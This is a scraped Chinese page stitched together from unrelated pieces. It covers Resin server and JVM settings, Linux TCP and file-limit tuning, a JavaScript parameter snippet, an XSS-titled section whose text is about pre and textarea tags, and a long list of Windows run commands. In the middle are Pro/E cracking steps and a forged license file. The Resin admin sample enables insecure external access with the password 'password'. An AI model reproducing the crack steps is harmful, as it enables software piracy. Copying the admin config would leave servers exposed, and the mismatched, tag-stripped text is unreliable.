resin 配置jvm 参数 在哪个文件

Resin配置优化

1. Resin安装及自启动设置

创建开机自动启动

cp contrib/init.resin /etc/rc.d/init.d/resin

vi /etc/rc.d/init.d/resin

设置正确的路径

JAVA_HOME=/usr/local/jdk1.6.0_13

RESIN_HOME=/usr/local/resin-3.1.8

赋予可执行权限

chmod +x /etc/rc.d/init.d/resin

加为自启动服务：

chkconfig --add resin

chkconfig --level 35 resin on

service resin start

解决启动服务错误： log_daemon_msg: command not found

将该函数调用到的地方注释掉并用echo 来代替。如：

log_daemon_msg “resin start”

改为

echo “resin start”

修改好后可以用service resin start/stop/restart来执行相关的命令。

2. 设置resin.conf参数及JVM设置

jvm-arg-Xmx4096m/jvm-arg

jvm-arg-Xms4096m/jvm-arg

jvm-arg-Xmn512M/jvm-arg

jvm-arg-Xss50M/jvm-arg

jvm-arg-XX:PermSize=768M/jvm-arg

jvm-arg-XX:MaxPermSize=768M/jvm-arg

jvm-arg-XX:SurvivorRatio=8/jvm-arg

jvm-arg-XX:MaxTenuringThreshold=7/jvm-arg

jvm-arg-XX:GCTimeRatio=19/jvm-arg

jvm-arg-XX:+UseParNewGC/jvm-arg

jvm-arg-XX:+UseConcMarkSweepGC/jvm-arg

jvm-arg-XX:+CMSPermGenSweepingEnabled/jvm-arg

jvm-arg-XX:+CMSClassUnloadingEnabled/jvm-arg

jvm-arg-XX:+UseCMSCompactAtFullCollection/jvm-arg

jvm-arg-XX:CMSFullGCsBeforeCompaction=2/jvm-arg

jvm-arg-XX:-CMSParallelRemarkEnabled/jvm-arg

jvm-arg-XX:+DisableExplicitGC/jvm-arg

jvm-arg-XX:CMSInitiatingOccupancyFraction=70/jvm-arg

jvm-arg-XX:SoftRefLRUPolicyMSPerMB=0/jvm-arg

jvm-arg-XX:+PrintClassHistogram/jvm-arg

jvm-arg-XX:+PrintGCDetails/jvm-arg

jvm-arg-XX:+PrintGCTimeStamps/jvm-arg jvm-arg-XX:+PrintGCApplicationConcurrentTime/jvm-arg

jvm-arg-XX:+PrintGCApplicationStoppedTime/jvm-arg

jvm-arg-Xloggc:log/gc.log/jvm-arg

jvm-arg-Xdebug/jvm-arg

jvm-arg-Dcom.sun.management.jmxremote/jvm-arg

内存设置配置：

memory-free-min5M/memory-free-min

最大线程数

!-- Maximum number of threads. --

thread-max1024/thread-max

!-- Configures the socket timeout --

socket-timeout65s/socket-timeout

配置最活连接和超时时间

!-- Configures the keepalive --

keepalive-max2048/keepalive-max

keepalive-timeout15s/keepalive-timeout

3. 配置jconsole监控JVM

$JAVA_HOME/jre/lib/management/jmxremote.password.template的文件是远程连接时的设置用户和密码的文件，

cp $JAVA_HOME/jre/lib/management/jmxremote.password.template $JAVA_HOME/jconsole/jmxremote.password

chmod 600 $JAVA_HOME/jconsole/jmxremote.password

vi jmxremote.password

去掉#monitorRole RED前的注释并将RED修改为你要设置的密码。在resin.conf加入以下配置，其中被监控主机的IP需要和主机IP一致

jvm-arg-Dcom.sun.management.jmxremote.port=12345/jvm-arg

jvm-arg-Dcom.sun.management.jmxremote.ssl=false/jvm-arg

jvm-arg-Dcom.sun.management.jmxremote.access.file=/usr/local/jdk1.6.0_13/jre/lib/management/jmxremote.access/jvm-arg jvm-arg-Dcom.sun.management.jmxremote.password.file=/usr/local/jdk1.6.0_13/jre/lib/management/jmxremote.password/jvm-arg

jvm-arg-Dcom.sun.management.jmxremote.authenticate=true/jvm-arg

jvm-arg-Djava.rmi.server.hostname=192.168.100.9/jvm-arg

在客户端基本不用怎么设置，在 JDK 安装目录中（JDK_HOME/bin/jconsole.exe）启动 jconsole.exe 就可以打开主界面。输入192.168.100.9：12345 用户名和密码即可看到监控界面中关于jvm的相关信息。操作

双击jconsole.exe启动连接对话框

4. 配置Resin后台管理

management path=“${resin.root}/admin”

user name=“admin” password=“MnHpobDOvrMOyQFWoa5w7A==”/

resin:if test=“${resin.professional}”

deploy-service/

jmx-service/

log-service/

xa-log-service/

/resin:if

/management

web-app id=“/resin-admin” root-directory=“${resin.home}/php/admin”

!--

- Administration application /resin-admin--

prologue

resin:set var=“resin_admin_user” value=“admin”/

resin:set var=“resin_admin_password” value=“password”/

resin:set var=“resin_admin_external” value=“true”/

resin:set var=“resin_admin_insecure” value=“true”/

/prologue

/web-app

二。 网络优化部分

1. 减少TCP连接中的TIME-WAIT或 CLOSE-WAIT包

Vim /etc/sysctl.conf加入以下配置

net.ipv4.tcp_syncookies = 1

net.ipv4.tcp_tw_reuse = 1

net.ipv4.tcp_tw_recycle = 1

net.ipv4.tcp_fin_timeout = 15

net.ipv4.tcp_keepalive_time = 1200

net.ipv4.tcp_keepalive_probes = 5

net.ipv4.tcp_keepalive_intvl = 15

配置属性说明：

net.ipv4.tcp_syncookies = 1 表示开启SYN Cookies。当出现SYN等待队列溢出时，启用cookies来处理，可防范少量SYN攻击，默认为0，表示关闭；

net.ipv4.tcp_tw_reuse = 1 表示开启重用。允许将TIME-WAIT sockets重新用于新的TCP连接，默认为0，表示关闭；

net.ipv4.tcp_tw_recycle = 1 表示开启TCP连接中TIME-WAIT sockets的快速回收，默认为0，表示关闭。

tcp_syn_retries ：INTEGER

默认值是5

对于一个新建连接，内核要发送多少个 SYN 连接请求才决定放弃。不应该大于255，默认值是5，对应于180秒左右时间。（对于大负载而物理通信良好的网络而言，这个值偏高，可修改为2.这个值仅仅是针对对外的连接，对进来的连接，是由tcp_retries1 决定的）

tcp_synack_retries ：INTEGER

默认值是5

对于远端的连接请求SYN，内核会发送SYN ＋ ACK数据报，以确认收到上一个 SYN连接请求包。这是所谓的三次握手（ threeway handshake）机制的第二个步骤。这里决定内核在放弃连接之前所送出的 SYN+ACK 数目。不应该大于255，默认值是5，对应于180秒左右时间。（可以根据上面的 tcp_syn_retries 来决定这个值）

tcp_keepalive_time ：INTEGER

默认值是7200（2小时）

当keepalive打开的情况下，TCP发送keepalive消息的频率。（由于目前网络攻击等因素，造成了利用这个进行的攻击很频繁，曾经也有cu的朋友提到过，说如果2边建立了连接，然后不发送任何数据或者rst/fin消息，那么持续的时间是不是就是2小时，空连接攻击？ tcp_keepalive_time就是预防此情形的。我个人在做nat服务的时候的修改值为1800秒）

tcp_keepalive_probes：INTEGER

默认值是9

TCP发送keepalive探测以确定该连接已经断开的次数。（注意：保持连接仅在SO_KEEPALIVE套接字选项被打开是才发送。次数默认不需要修改，当然根据情形也可以适当地缩短此值。设置为5比较合适）

tcp_keepalive_intvl：INTEGER

默认值为75

探测消息发送的频率，乘以tcp_keepalive_probes就得到对于从开始探测以来没有响应的连接杀除的时间。默认值为75秒，也就是没有活动的连接将在大约11分钟以后将被丢弃。（对于普通应用来说，这个值有一些偏大，可以根据需要改小。特别是web类服务器需要改小该值，15是个比较合适的值）

再执行以下命令，让修改结果立即生效：/sbin/sysctl -p

用以下语句看了一下服务器的TCP状态：

netstat -n | awk '/^tcp/ {++S[$NF]} END {for（a in S） print a, S[a]}'

三。 解决Too many open files问题

Too many open files 问题出现有两种情况：

一种是在搜索的时候出现，多半是由于索引创建完毕之后被移动过，如果创建索引的时候不出现该错误，搜索的时候也一般是不会出现的。如果出现了，有两种处理办法，一种是修改合并因子和最小合并因子，并且使用

IndexWriter.Optimize（） 优化索引，这样会将索引文件数量减少到文件系统限制之内；另外一种办法是修改操作系统的打开文件数量限制。方法如下：

按照最大打开文件数量的需求设置系统， 并且通过检查/proc/sys/fs/file-max文件来确认最大打开文件数已经被正确设置。 配置操作如下：

# cat /proc/sys/fs/file-max

如果设置值太小， 修改文件/etc/sysctl.conf的变量到合适的值。 这样会在每次重启之后生效。

# echo 65535 /proc/sys/fs/file-max

编辑文件/etc/sysctl.conf，插入下行。

fs.file-max = 65535

执行sysctl –p生效

设置ulimit –n 65535

在/etc/security/limits.conf文件中设置最大打开文件数， 下面是一行提示：

#

添加如下这行。

* - nofile 65535

这行设置了每个用户的默认打开文件数为2048。 注意“nofile”项有两个可能的限制措施。就是项下的hard和soft。 要使修改过得最大打开文件数生效，必须对这两种限制进行设定。 如果使用“-”字符设定， 则hard和soft设定会同时被设定。

硬限制表明soft限制中所能设定的最大值。 soft限制指的是当前系统生效的设置值。 hard限制值可以被普通用户降低。但是不能增加。 soft限制不能设置的比hard限制更高。 只有root用户才能够增加hard限制值。

当增加文件限制描述，可以简单的把当前值双倍。 例子如下， 如果你要提高默认值1024， 最好提高到2048， 如果还要继续增加， 就需要设置成4096。

另外一种情况是在创建索引的时候，也有两种可能，一种是合并因子太小，导致创建文件数量超过操作系统限制，这时可以修改合并因子，也可以修改操作系统的打开文件数限制；另外一种是合并因子受虚拟机内存的限制，无法调整到更大，而 需要索引的doc 数量又非常的大，这个时候就只能通过修改操作系统的打开文件数限制来解决了。

在系统访问高峰时间以root用户执行以下的脚本，可能出现的结果如下：

# lsof -n|awk '{print $2}'|sort|uniq -c |sort -nr|more

131 24204

57 24244

其中第一行是打开的文件句柄数量，第二行是进程号。得到进程号后，我们可以通过ps命令得到进程的详细内容。

ps -aef|grep 24204

mysql 24204 24162 99 16:15 ? 00:24:25 /usr/sbin/mysqld

系统默认程打开最多文件句柄数值1024。但是如果系统并发特别大，尤其是squid服务器，很有可能会超过1024。这时候就必须要调整系统参数，以适应应用变化。Linux有硬性限制和软性限制。可以通过ulimit来设定这两个参数。方法如下，以root用户运行以下命令：

ulimit -HSn 4096 以上命令中，H指定了硬性大小，S指定了软性大小，n表示设定单个进程最大的打开文件句柄数量。设定句柄数量后，系统重启后，又会恢复默认值。如果想永久保存下来， /etc/security/limits.conf

pro e5.0 license request failed for feature PROE_200 -2

1.运行Setup.exe

2.记下PTC主机ID

3.复制破解目录内的"ptc_licfile.dat"到硬盘.并用记事本打开。将里面所有的"00-00-00-00-00-00"改为你的PTC主机ID后保存

4.开始安装软件到指定许可证服务器时选"锁定的许可证文件"后选修改后的"ptc_licfile.dat"

5.安装完成后将破解目录内"ptc.pro engineer.wildfire.4.0.win32-patch.exe"复制到"安装目录下\i486_nt\obj folder"目录内并运行

6.编辑“安装目录下\bin\proev.bat

改为以下的文本

change "%start_cmd% "%CGTECH_JRE%\bin\javaw" -Xms16m -Xmx64m -Xss4m -classpath "%CGTECH_CLASSES%;%CGTECH_CLASSES%\CGTech.jar" Vericut %argstr%" in

"%start_cmd% "%CGTECH_JRE%\bin\javaw" -Xms16m -Xmx64m -Xss4m -classpath "%CGTECH_CLASSES%;%CGTECH_CLASSES%\CGTech.jar" Vericut %argstr% PTC_KEY=0"

(add PTC_KEY=0)

7.运行软件即可

把下面文件复制到记事本 保存为DAT后缀名的文件 一下是proe4.0版本的许可证

###################################################################

#

# replace 00-00-00-00-00-00 in every-feature with your real ptc_hostid

# as shown in setup

#

###################################################################

INCREMENT PROE_DDiTy ptc_d 29.0 permanent uncounted \

VENDOR_STRING="VSVER=2.0 LO=(0,3,6,7,9,10,14,16,17,19,21,22, \

23,24,25,26,29,30,31,32,34,35,36,37,40,41,45,47,48,51,52,53, \

54,55,56,57,59,60,61,62,63,65,66,67,69,71,72,73,74,77,91,92, \

93,94,97,100,104,106,108,115,116,117,118,119,120,121,122,123, \

125,126,127,128, 131,133,134,135, 137,139,140,141,148,155,156, \

158,160,163,164,167,168,187,188,189,190,191,192,193,194,208,209,210, \

213,214,218,219,220,221,222,223,224,251,253,259,260,261,262,263,264,275)" SUPERSEDE \

HOSTID=PTC_HOSTID=00-00-00-00-00-00 vendor_info="VIVER=2.0 EXTERNAL_NAME=" ISSUER=ODT \

ISSUED=2-apr-2006 NOTICE=PTC SN=07071982 SIGN="092F DBD8 F7BA \

EC9D 51E5 453C 93A1 D63D 0BC7 3126 8493 2C23 32A9 A98F 8BC0 1BEB \

0F0F 5C63 6933 5B61 613F 0CFB 235B 9C1B B39E 274F 2E5A 60E1 1FEF \

DE6A" SIGN2="092F DBD8 F7BA EC9D 51E5 453C 93A1 D63D 0BC7 3126 \

8493 2C23 32A9 A98F 8BC0 1BEB 0F0F 5C63 6933 5B61 613F 0CFB 235B \

9C1B B39E 274F 2E5A 60E1 1FEF DE6A"

INCREMENT MECBASICUI_12345 ptc_d 29.0 permanent uncounted \

VENDOR_STRING="VSVER=2.0 LO=(19,157,211)" SUPERSEDE HOSTID=PTC_HOSTID=00-00-00-00-00-00 \

vendor_info="VIVER=2.0 EXTERNAL_NAME=" ISSUER=ODT \

ISSUED=2-apr-2006 NOTICE=PTC SN=07071982 SIGN="092F DBD8 F7BA \

EC9D 51E5 453C 93A1 D63D 0BC7 3126 8493 2C23 32A9 A98F 8BC0 1BEB \

0F0F 5C63 6933 5B61 613F 0CFB 235B 9C1B B39E 274F 2E5A 60E1 1FEF \

DE6A" SIGN2="092F DBD8 F7BA EC9D 51E5 453C 93A1 D63D 0BC7 3126 \

8493 2C23 32A9 A98F 8BC0 1BEB 0F0F 5C63 6933 5B61 613F 0CFB 235B \

9C1B B39E 274F 2E5A 60E1 1FEF DE6A"

INCREMENT MECBASICENG_12345 ptc_d 29.0 permanent uncounted \

VENDOR_STRING="VSVER=2.0 LO=(19,161,212)" SUPERSEDE HOSTID=PTC_HOSTID=00-00-00-00-00-00 \

vendor_info="VIVER=2.0 EXTERNAL_NAME=" ISSUER=ODT \

ISSUED=2-apr-2006 NOTICE=PTC SN=07071982 SIGN="092F DBD8 F7BA \

EC9D 51E5 453C 93A1 D63D 0BC7 3126 8493 2C23 32A9 A98F 8BC0 1BEB \

0F0F 5C63 6933 5B61 613F 0CFB 235B 9C1B B39E 274F 2E5A 60E1 1FEF \

DE6A" SIGN2="092F DBD8 F7BA EC9D 51E5 453C 93A1 D63D 0BC7 3126 \

8493 2C23 32A9 A98F 8BC0 1BEB 0F0F 5C63 6933 5B61 613F 0CFB 235B \

9C1B B39E 274F 2E5A 60E1 1FEF DE6A"

INCREMENT MECSTRUCUI_12345 ptc_d 29.0 permanent uncounted \

VENDOR_STRING="VSVER=2.0 LO=(19,81,157,159,161)" SUPERSEDE HOSTID=PTC_HOSTID=00-00-00-00-00-00 \

vendor_info="VIVER=2.0 EXTERNAL_NAME=" ISSUER=ODT \

ISSUED=2-apr-2006 NOTICE=PTC SN=07071982 SIGN="092F DBD8 F7BA \

EC9D 51E5 453C 93A1 D63D 0BC7 3126 8493 2C23 32A9 A98F 8BC0 1BEB \

0F0F 5C63 6933 5B61 613F 0CFB 235B 9C1B B39E 274F 2E5A 60E1 1FEF \

DE6A" SIGN2="092F DBD8 F7BA EC9D 51E5 453C 93A1 D63D 0BC7 3126 \

8493 2C23 32A9 A98F 8BC0 1BEB 0F0F 5C63 6933 5B61 613F 0CFB 235B \

9C1B B39E 274F 2E5A 60E1 1FEF DE6A"

html问题，如何链接到新页面的同时，在新页面调用其中的JS？

例:

1.html代码如下:

script language='javascript' type='text/javascript'

var a=12345;

var b=67890;

//举例,如果要传递变量a值是12345//变量b值是67890

function funTo2html()

{

window.location.href='2.html?a='+a+'b='+b;

}

/script

按钮:

input type='button' onclick='funTo2html'

2.html代码如下:

script language='javascript' type='text/javascript'

function funGetUrlParam(isIntIndex)//JS函数,取传递值

{

if (location.href.split('?').length 1)

{

var url1 = location.href.split('?')[1];

var ar = url1.split('');

var jh = ar[isIntIndex].split('=')[1];

if (jh.indexOf('#') = 0)

{

jh = jh.split("#")[0];

}

return jh;

}

return false;

}

var a=funGetUrlParam(0),b=funGetUrlParam(1);

function showAB()

{

var str='传递的a值是:+a+'\n传递的b值是:'+b;

alert(str);

}

/script

测试按钮:

input type='button' onclick='showAB()'

楼主你说的情况也不是不可能实现,不过代码你自己找找,我告诉你一下思路

添加一个框架页,包含1.html,2.html

在1.html里写事件调取框架里的2的funa()，

因为很长时间没有用框架了,代码忘了,不过肯定能实现

如何对执行了特殊字符转义的网站进行XSS攻击

Html中特殊字符不被转义，可以使用预格式化标签。pre 是 Preformatted text（预格式化文本） 的缩写。使用此标签可以把代码中的空格和换行直接显示到页面上。例如HTML代码：　

12345

pre　if (xx 5) {　print "比5大！\n";　}　/pre

浏览器显示效果：if (xx 5) {print "比5大！\n";}textarea/textarea之间包含有类似的这种转义字符的时候总会被解析，倒是可以把所有的""通过程序替换成""，但是有些本来就是""的也会被转换，这就错了。如何让textarea/textarea之间包含的文本原封不动的显示出来呢？总结如下:解决方法有两种：第1种：

123456

bodytextarea id='t' rows=20 cols=20/textareascriptdocument.getElementById('t').innerText='a';/script/body

电脑系统知识

cmd命令

路由

tsadmin.exe Administrator 终端服务管理器 (XP不可用)

tscon.exe 粘贴用户会话到终端对话

tsdiscon.exe 断开终端服务的用户

tskill.exe 杀掉终端服务

tsprof.exe 用终端服务得出查询结果

tsshutdn.exe 关闭系统

unlodctr.exe 性能监视器的一部分

upg351db.exe 升级Jet数据库 (XP不可用)

ups.exe UPS service UPS服务

user.exe Windows核心服务

userinit.exe 打开我的文档

usrmgr.exe 域用户管理器

utilman.exe 指定2000启动时自动打开那台机器

vwipxspx.exe 调用IPX/SPX VDM

w32tm.exe 时间服务器

wextract.exe 解压缩Windows文件

winchat.exe 打开Windows聊天工具

winhlp32.exe 运行帮助系统

winmsd.exe 查看系统信息

winver.exe 显示Windows版本

wizmgr.exe Windows管理向导 (XP不可用)

wjview.exe Java 命令行调用Java

write.exe 打开写字板

wscript.exe 脚本工具

wupdmgr.exe Windows update 运行Windows update升级向导

winver 检查Windows版本

Win98系统工具

开始,运行,输入Msconfig 系统配置实用工具配置启动选项，包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的

wmimgmt.msc 打开Windows管理体系结构(wmi)

wupdmgr Windows更新程序

wscript Windows脚本宿主设置

write 写字板

winmsd 系统信息

wiaacmgr 扫描仪和照相机向导

winchat xp自带局域网聊天

mem.exe 显示内存使用情况

msconfig.exe 系统配置实用程序

mplayer2 简易widnows media player

mspaint 画图板

mstsc 远程桌面连接

mplayer2 媒体播放机

magnify 放大镜实用程序

mmc 打开控制台

mobsync 同步命令

dxdiag 检查directx信息

drwtsn32 系统医生

devmgmt.msc 设备管理器

dfrg.msc 磁盘碎片整理程序

diskmgmt.msc 磁盘管理实用程序

dcomcnfg 打开系统组件服务

ddeshare 打开dde共享设置

dvdplay dvd播放器

net stop messenger 停止信使服务

net start messenger 开始信使服务

notepad 打开记事本

nslookup 网络管理的工具向导

ntbackup 系统备份和还原

narrator 屏幕“讲述人”

ntmsmgr.msc 移动存储管理器

ntmsoprq.msc 移动存储管理员操作请求

netstat -an （tc）命令检查接口

syncapp 创建一个公文包

sysedit 系统配置编辑器

sigverif 文件签名验证程序

sndrec32 录音机

shrpubw 创建共享文件夹

secpol.msc 本地安全策略

syskey 系统加密，一旦加密就不能解开，保护Windows xp系统的双重密码

services.msc 本地服务设置

sndvol32 音量控制程序

sfc.exe 系统文件检查器

sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令

tourstart xp简介（安装完成后出现的漫游xp程序）

taskmgr 任务管理器

eventvwr 事件查看器

eudcedit 造字程序

explorer 打开资源管理器

packager 对象包装程序

perfmon.msc 计算机性能监测程序

progman 程序管理器

regedit.exe 注册表

rsop.msc 组策略结果集

regedt32 注册表编辑器

rononce -p 15秒关机

regsvr32 /u *.dll 停止dll文件运行

regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符

chkdsk.exe chkdsk磁盘检查

certmgr.msc 证书管理实用程序

calc 启动计算器

charmap 启动字符映射表

cliconfg sql server 客户端网络实用程序

clipbrd 剪贴板查看器

conf 启动netmeeting

compmgmt.msc 计算机管理

cleanmgr 垃圾整理

ciadv.msc 索引服务程序

osk 打开屏幕键盘

odbcad32 odbc数据源管理器

oobe/msoobe /a 检查xp是否激活

lusrmgr.msc 本机用户和组

logoff 注销命令

iexpress 木马捆绑工具，系统自带

nslookup ip地址侦测器

fsmgmt.msc 共享文件夹管理器

utilman 辅助工具管理器

gpedit.msc 组策略

以下为Windows操作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本

的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!!

运行\输入CMD\输入 对应的相关实用程序:

. 打开C:＼Documents and Settings＼XXX(当前登录Windows XP的用户名)

.. 打开Windows XP所在的盘符下的Documents and Settings文件夹

... 打开“我的电脑”选项。

accwiz.exe 辅助工具向导

actmovie.exe 直接显示安装工具

append.exe 允许程序打开制定目录中的数据

arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表

at.exe 计划运行任务

atmadm.exe ATM调用管理器统计

attrib.exe 显示和更改文件和文件夹属性

autochk.exe 检测修复文件系统 (XP不可用)

autoconv.exe 在启动过程中自动转化系统 (XP不可用)

autofmt.exe 在启动过程中格式化进程 (XP不可用)

autolfn.exe 使用长文件名格式 (XP不可用)

arp.exe 显示和更改计算机的IP与硬件物理地址的对应

calc.exe 计算器

Bootvrfy.exe 通报启动成功

cacls.exe 显示和编辑ACL

cdplayer.exe CD播放器

change.exe 与终端服务器相关的查询 (XP不可用)

charmap.exe 字符映射表

chglogon.exe 启动或停用会话记录 (XP不可用)

chgport.exe 改变端口（终端服务） (XP不可用)

chgusr.exe 改变用户（终端服务） (XP不可用)

chkdsk.exe 磁盘检测程序

chkntfs.exe NTFS磁盘检测程序

cidaemon.exe 组成Ci文档服务

cipher.exe 在NTFS上显示或改变加密的文件或目录

cisvc.exe 打开索引内容

ckcnv.exe 变换Cookie

cleanmgr.exe 磁盘清理

cliconfg.exe SQL客户网络工具

clipbrd.exe 剪贴簿查看器

clipsrv.exe 运行Clipboard服务

clspack.exe 建立系统文件列表清单

cluster.exe 显示域的集群 (XP不可用)

cmd.exe 进2000\XP DOS

cmdl32.exe 自动下载连接管理

cmmgr32.exe 连接管理器

cmmon32.exe 连接管理器监视

cmstp.exe 连接管理器配置文件安装程序

comclust.exe 集群

comp.exe 比较两个文件和文件集的内容

conf 启动netmeeting聊天工具

control userpasswords2 XP密码管理.

compmgmt.msc 计算机管理

cprofile.exe 转换显示模式 (XP不可用)

开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名

工作站处于活动状态（即网络描述） \软件版本（即软件版本号） \工作站域 工作站域的 DNS 名称

登录域 \COM 打开时间超时（秒） \COM 发送量（字节） \COM 发送超时 (msec)

CMD\输入net config workstation 更改可配置工作站服务设置。

CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本（即软件版本号）

服务器处于活动状态（即网络描述） \服务器处于隐藏状态（即 /hidden 设置）

最大登录用户数（即可使用服务器共享资源的最大用户数）

每个会话打开文件的最大数（即用户可在一个会话中打开服务器文件的最大数）

空闲会话时间（最小值）

chkdsk.exe 磁盘检查.

Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件

cleanmgr 垃圾整理

Clipbrd 剪贴板查看器

C:boot.ini 打开启动菜单

compact.exe 显示或改变NTFS分区上文件的压缩状态

conime.exe IME控制台

control.exe 控制面板

convert.exe NTFS 转换文件系统到NTFS

convlog.exe 转换IIS日志文件格式到NCSA格式

cprofile.exe 转换显示模式

cscript.exe 较本宿主版本

csrss.exe 客户服务器Runtime进程 (XP不可用)

csvde.exe 格式转换程序 (XP不可用)

dcpromo 活动目录安装(XP不可用)

drwtsn32 系统医生

diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0)

dvdplay DVD 播放器

devmgmt.msc 设备管理器(检查电脑硬件,驱动)

dxdiag 检查DirectX信息

dcomcnfg.exe DCOM配置属性 (控制台根目录)

dcpromo.exe 安装向导 (XP不可用)

ddeshare.exe DDE共享

debug.exe 检查DEBUG

dfrgfat.exe FAT分区磁盘碎片整理程序

dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用)

dfs_cmd_.exe 配置DFS树 (XP不可用)

dfsinit.exe 分布式文件系统初始化(XP不可用)

dfssvc.exe 分布式文件系统服务器 (XP不可用)

diantz.exe 制作CAB文件

diskperf.exe 磁盘性能计数器

dmremote.exe 磁盘管理服务的一部分 (XP不可用)

doskey.exe 命令行创建宏

dosx.exe DOS扩展

dplaysvr.exe 直接运行帮助 (XP不可用)

drwatson.exe 华生医生错误检测

drwtsn32.exe 华生医生显示和配置管理

dvdplay.exe DVD播放

dxdiag.exe Direct-X诊断工具

edlin.exe 命令行的文本编辑

esentutl.exe MS数据库工具

eudcedit.exe 造字程序

eventvwr.exe 事件查看器

exe2bin.exe 转换EXE文件到二进制

expand.exe 解压缩

extrac32.exe 解CAB工具

fsmgmt.msc 共享文件夹

fastopen.exe 快速访问在内存中的硬盘文件

faxcover.exe 传真封面编辑

faxqueue.exe 显示传真队列

faxsend.exe 发送传真向导

faxsvc.exe 启动传真服务

fc.exe 比较两个文件的不同

find.exe 查找文件中的文本行

findstr.exe 查找文件中的行

finger.exe 一个用户并显示出统计结果

fixmapi.exe 修复MAPI文件

flattemp.exe 允许或者禁用临时文件目录 (XP不可用)

fontview.exe 显示字体文件中的字体

forcedos.exe 强制文件在DOS模式下运行

ftp.exe FTP下载

gpedit.msc 组策略

gdi.exe 图形界面驱动

grpconv.exe 转换程序管理员组

hostname.exe 显示机器的Hostname

Internat 输入法图标

iexpress 木马捆绑工具，系统自带

ieshwiz.exe 自定义文件夹向导

iexpress.exe iexpress安装包

iisreset.exe 重启IIS服务(未安装IIS,不可用)

internat.exe 键盘语言指示器 (XP不可用)

ipconfig.exe 查看IP配置

ipsecmon.exe IP安全监视器

ipxroute.exe IPX路由和源路由控制程序

irftp.exe 无线连接

ismserv.exe 安装或者删除Service Control Manager中的服务

jdbgmgr.exe Java4的调试器

jetconv.exe 转换Jet Engine数据库 (XP不可用)

jetpack.exe 压缩Jet数据库 (XP不可用)

jview.exe Java的命令行装载者

label.exe 改变驱动器的卷标

lcwiz.exe 许可证向导 (XP不可用)

ldifde.exe LDIF目录交换命令行管理 (XP不可用)

licmgr.exe 终端服务许可协议管理 (XP不可用)

lights.exe 显示连接状况 (XP不可用)

llsmgr.exe Windows 2000 许可协议管理 (XP不可用)

llssrv.exe 启动许可协议服务器 (XP不可用)

locator.exe RPC Locator 远程定位

lodctr.exe 调用性能计数

logoff.exe 注销当前用户

lpq.exe 显示远端的LPD打印队列的状态，显示被送到基于Unix的服务器的打印任务

lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。

lsass.exe 运行LSA和Server的DLL

lserver.exe 指定默认Server新的DNS域 (XP不可用)

lusrmgr.msc 本地账户管理

mmc 控制台

mplayer2 播放器

macfile.exe 管理MACFILES (XP不可用)

magnify.exe 放大镜

makecab.exe 制作CAB文件

mem.exe 显示内存状态

migpwd.exe 迁移密码

mmc.exe 控制台

mnmsrvc.exe 远程桌面共享

mobsync.exe 同步目录管理器

mountvol.exe 创建、删除或列出卷的装入点。

mplay32.exe Media Player 媒体播放器

mpnotify.exe 通知应用程序

mqbkup.exe 信息队列备份和恢复工具

mqmig.exe MSMQ Migration Utility 信息队列迁移工具

mrinfo.exe 使用SNMP多点传送路由

mscdexnt.exe 安装MSCD

msdtc.exe 动态事务处理控制台

msg.exe 发送消息到本地或远程客户

mshta.exe HTML应用程序主机

msiexec.exe 开始Windows安装程序

mspaint.exe 打开画图板

mstask.exe 任务计划表程序

mstinit.exe 任务计划表安装

Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)

mem.exe 显示内存使用情况

mspaint 画图板

Net Stop Messenger 停止信使服务

Net Start Messenger 恢复信使服务

nslookup 网络管理的工具

Nslookup IP 地址侦测器

ntbackup 系统备份和还原

nbtstat.exe 使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。

nddeapir.exe NDDE API服务器端

netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)

netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。

nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。

notepad.exe 打开记事本

nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。

ntbackup.exe 备份和故障修复工具

ntfrs.exe NT文件复制服务 (XP不可用)

ntvdm.exe 模拟16位Windows环境

nw16.exe NetWare转向器

nwscript.exe 运行Netware脚本

odbcad32.exe 32位ODBC数据源管理 (驱动程序管理)

odbcconf.exe 命令行配置ODBC驱动和数据源

packager.exe 对象包装程序

pathping.exe 包含Ping和Tracert的程序

pentnt.exe 检查Pentium的浮点错误

perfmon.exe 系统性能监视器

ping.exe 验证与远程计算机的连接

posix.exe 用于兼容Unix

print.exe 打印文本文件或显示打印队列的内容。

progman.exe 程序管理器

psxss.exe Posix子系统应用程序

qappsrv.exe 在网络上显示终端服务器可用的程序

qprocess.exe 在本地或远程显示进程的信息（需终端服务）

query.exe 查询进程和对话 (XP不可用)

quser.exe 显示用户登陆的信息（需终端服务）

qwinsta.exe 显示终端服务的信息

rononce -p 15秒关机

rasAdmin 远程访问服务.

regedit.exe 注册表编辑器

rasadmin.exe 启动远程访问服务 (XP不可用)

rasautou.exe 建立一个RAS连接

rasdial.exe 宽带,拨号连接

ras.exe 运行RAS连接 (XP不可用)

rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe 终端和本地复制和粘贴文件

recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。

redir.exe 运行重定向服务

regedt32.exe 32位注册服务

regini.exe 用脚本修改注册许可

regwiz.exe 注册向导

replace.exe 用源目录中的同名文件替换目标目录中的文件。

rexec.exe rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 TCP/IP 协议后才可以使用该命令。

risetup.exe 运行远程安装向导服务 (XP不可用)

route.exe 控制网络路由表

rsh.exe 在运行 RSH 服务的远程计算机上运行命令

rsnotify.exe 远程存储通知回显

runas.exe 允许用户用其他权限运行指定的工具和程序

